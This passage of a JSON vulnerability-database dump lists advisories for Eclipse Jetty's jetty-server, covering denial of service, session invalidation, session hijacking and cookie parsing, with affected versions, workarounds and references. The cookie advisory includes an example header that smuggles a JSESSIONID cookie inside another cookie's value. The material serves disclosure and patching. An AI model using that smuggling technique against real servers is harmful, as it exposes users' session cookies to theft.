\n\nCurrently, known vulnerable versions include:\n\n- 9.4.6.v20170531 thru to 9.4.36.v20210114\n- 10.0.0\n- 11.0.0\n\n### Workarounds\n\nQuality ordered values are used infrequently by jetty so they can be avoided by:\n\n * Do not use the default error page/handler.\n * Do not deploy the `StatisticsServlet` exposed to the network\n * Do not call `getLocale` API\n * Do not enable precompressed static content in the `DefaultServlet` \n\n### Patches\n\nAll patches are available for download from the Eclipse Jetty website at [https://www.eclipse.org/jetty/download.php](https://www.eclipse.org/jetty/download.php)\n- 9.4.37.v20210219 and greater\n- 10.0.1 and greater \n- 11.0.1 and greater", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.6" }, { "fixed": "9.4.37" } ] } ], "versions": [ "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-m394-8rww-3jr7/GHSA-m394-8rww-3jr7.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": 
"pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.1" } ] } ], "versions": [ "10.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-m394-8rww-3jr7/GHSA-m394-8rww-3jr7.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.1" } ] } ], "versions": [ "11.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-m394-8rww-3jr7/GHSA-m394-8rww-3jr7.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27223" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd666e187ebea2fda8624683ab51e2a5ad2108f762d21bf1a383d7502@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc721fe2910533bffb6bd4d69ea8ff4f36066d260dbcd2d14e041614a@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc052fd4e9e9c01bead74c0b5680355ea5dc3b72d46f253cb65d03e43@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb79b62ac3085e05656e41865f5a7efcbdc7dcd7843abed9c5fe0fef8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa6d60b00b67c0550672b4f506f0df75b323dcd25cf574e91e2f2dff@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra47a26c008487b0a739a368c846e168de06c3cd118d31ecedafa679a@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ra40a88a2301a3da86e25b501ff4bc88124f2b816c2917d5f3497f8f0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra384892bab8c03a60613a6a9d5e9cae0a2b800fd882792a55520115e@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2f529da674f25a7351543544f7d621b5227c49a0745913b1194d11e@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8dc1b13b80d39fbf4a9d158850e15cd868f0460c2f364f13dca7050b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b1963f16d6cb1230ca7ee73b6ec4f5c48f344191dbb1caabd265ee4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r897a6a14d03eab09e89b809d2a650f3765065201da5bc3db9a4dd6e8@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r857b31ad16c6e76002bc6cca73c83358ed2595477e288286ee82c48d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r855b24a3bde3674256152edfc53fb8c9000f9b59db3fecbbde33b211@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ffd050d3bd7c90d95f4933560b5f4f15971ab9a5f5322fdce116243@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7fbdb7880be1566f943d80fbbeefde2115c086eba1bef3115350a388@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd6c47321db1bfe12c68a898765bf3b6f97e2afa6a501254ed4feaed@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/re03a4dbc15df6f390a2f8c0a071c31c8324dbef007e59fdc2592091a@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0d38cc2b5da28f708fc89de49036f3ace052c47a1202f7d70291614@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re19fa47ec901cc3cf6d7784027198e8113f8bc2dbfd6c9d6d13f5447@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd4f831f9be49871cb6adb997289b5dbcd6fe4bc5cb08223254080@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re43768896273c0b5f1a03d7f0a9d370852074489d51825fdc0d77f0f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re819198d4732804dc01fca8b5b144689a118ede49f6128968773595c@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb3c6dc050c7ee18ea154cd94dba85d99aa6b02b84c4bb2138a4abf2@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reca91f217f9e1ce607ce6e19a1c0b3db82b5b1b58cf39a84d6434695@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf190d1d28e1367d1664ef6bc2f71227566d7b6b39209817a5364da1f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6c2efa3137bc8c22707e550a1f9b80f74bca62b9c8a6f768f2c6b86@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf77f4c4583669f1133d58cc4f1964367e253818ed8db986bb2732f7c@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff630ce92a4d1bb494fc1a3f9b57a3d60819b436505bcd8c6ccc713c@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210401-0005" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c947376491a20d1cf143bf3c21ed74113e099d806cfe4c490a45ad8@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c2c7b2971360fb946bbf062c58d7245927dd1ce9150fc9987f65409@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27ad7843d060762cc942820566eeaa9639f75371afedf8124b943283@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r26d9196f4d2afb9bec2784bcb6fc183aca82e4119bf41bdc613eec01@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b803e6ebdac5f670708878fb1b27cd7a0ce9d774a60e797e58cee6f@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b7ed296a865e3f1337a96ee9cd51f6d154d881a30da36020ca72a4b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1414ab2b3f4bb4c0e736caff6dc8d15f93f6264f0cca5c47710d7bb3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r105f4e52feb051faeb9141ef78f909aaf5129d6ed1fc52e099c79463@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0e25cdf3722a24c53049d37396f0da8502cb4b7cdc481650dc601dbc@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0cdab13815fc419805a332278c8d27e354e78560944fc36db0bdc760@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c6eced465950743f3041b03767a32b2e98d19731bd72277fc7ea428@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b639bd9bfaea265022125d18acd2fc6456044b76609ec74772c9567@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r07aedcb1ece62969c406cb84c8f0e22cec7e42cdc272f3176e473320@%3Cusers.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r068dfd35ce2193f6af28b74ff29ab148c2b2cacb235995576f5bea78@%3Cissues.solr.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=571128" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7f4ad5eec0bce2821c308bb23cac53df5c94eb84de1c58de9b95c176@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75ee2a529edb892ac59110cb3f6f91844a932c5034e16c8317f5668d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r734f996149bb9b1796740385fcbdf3e093eb9aabedc0f20a48ea1d68@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r601f15f3de7ae3a7bbcd780c19155075c56443c2cdc1d193c03b4182@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b7cc6ac733e0b35816751cf45d152ae246a3f40e0b1e62b101c9522@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r562a0cbc5c8cac4d000a27b2854a8ab1b924aa9dd45f8ffbea98e5ad@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5612dc69e1f79c421faf9764ffbc92591e2a69ea417c04cba57f49ea@%3Cuser.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r521a077885ce79c44a799118c878589e81e525cab72d368e5cfb6f61@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r51f8975ef47c12a46fbfd7da9efea7f08e1d307fe1dc3042514659ae@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c92ea39167c0f7b096ae8268db496b5451d69606f0304b7c8a994c7@%3Cissues.nifi.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/r4a456d89a83752a012d88a60ff4b21def6c9f650b9e69ea9fa11c9f9@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r492cff8488a7f6eb96700afb5d137b719ddb80a833e77f971d2691c6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r463b12b27264c5e1e3c48c8c2cc5d33813d2f0d981102548fb3102fb@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r409ee2bae66bfff6aa89e6c74aff535e6248260d3afcb42bfb3b316b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3ce0e31b25ad4ee8f7c42b62cfdc72d1b586f5d6accd23f5295b6dd1@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35ab810c0f3016b3fd3a3fa9088a2d2781b354a810780ce74d022b6c@%3Cdev.kafka.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-10T03:46:22Z", "nvd_published_at": "2021-02-26T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m6cp-vxjx-65j6", "published": "2021-06-23T20:23:04Z", "modified": "2024-02-17T05:34:59.415608Z", "aliases": [ "CVE-2021-34428" ], "related": [ "CVE-2021-34428" ], "summary": "SessionListener can prevent a session from being invalidated breaking logout", "details": "### Impact\nIf an exception is thrown from the `SessionListener#sessionDestroyed()` method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. 
This can result in an application used on a shared computer being left logged in.\n\nThere is no known path for an attacker to induce such an exception to be thrown, thus they must rely on an application to throw such an exception. The OP has also identified that during the call to `sessionDestroyed`, the `getLastAccessedTime()` throws an `IllegalStateException`, which is potentially contrary to the servlet spec, so applications calling this method may always throw and fail to log out. If such an application was only tested on a non-clustered test environment, then it may be deployed on a clustered environment with multiple contexts and fail to log out.\n\n### Workarounds\nThe application should catch all Throwables within their `SessionListener#sessionDestroyed()` implementations.\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.41" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916",
"7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", 
"9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", 
"9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.40", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-m6cp-vxjx-65j6/GHSA-m6cp-vxjx-65j6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.3" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-m6cp-vxjx-65j6/GHSA-m6cp-vxjx-65j6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.3" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-m6cp-vxjx-65j6/GHSA-m6cp-vxjx-65j6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34428" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210813-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-613" ], "github_reviewed": true, "github_reviewed_at": "2021-06-22T16:41:00Z", "nvd_published_at": "2021-06-22T15:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mwcx-532g-8pq3", "published": "2018-10-16T17:44:11Z", "modified": "2024-02-17T05:43:52.147542Z", "aliases": [ "CVE-2018-12538" ], "summary": "Access and integrity issue within Eclipse Jetty", "details": "In Eclipse Jetty versions 9.4.0 through 9.4.8, when using the optional Jetty provided FileSessionDataStore for persistent storage of HttpSession details, it is possible for a malicious user to access/hijack other HttpSessions and even delete unmatched HttpSessions present in the FileSystem's storage for the FileSessionDataStore.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": 
"pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.10.v20180503", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-mwcx-532g-8pq3/GHSA-mwcx-532g-8pq3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12538" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=536018" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mwcx-532g-8pq3" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-384", "CWE-6" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:47:31Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p26g-97m4-6q7c", "published": "2023-04-18T22:19:57Z", "modified": 
"2024-02-20T05:30:22.058149Z", "aliases": [ "CVE-2023-26049" ], "related": [ "CGA-6jj8-gqq9-qj3c", "CVE-2023-26049" ], "summary": "Eclipse Jetty's cookie parsing of quoted values can exfiltrate values from other cookies", "details": "Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism.\n\nIf Jetty sees a cookie VALUE that starts with `\"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered.\n\nSo, a cookie header such as:\n\n`DISPLAY_LANGUAGE=\"b; JSESSIONID=1337; c=d\"` will be parsed as one cookie, with the name `DISPLAY_LANGUAGE` and a value of `b; JSESSIONID=1337; c=d`\n\ninstead of 3 separate cookies.\n\n### Impact\nThis has security implications because if, say, `JSESSIONID` is an `HttpOnly` cookie, and the `DISPLAY_LANGUAGE` cookie value is rendered on the page, an attacker can smuggle the `JSESSIONID` cookie into the `DISPLAY_LANGUAGE` cookie and thereby exfiltrate it. 
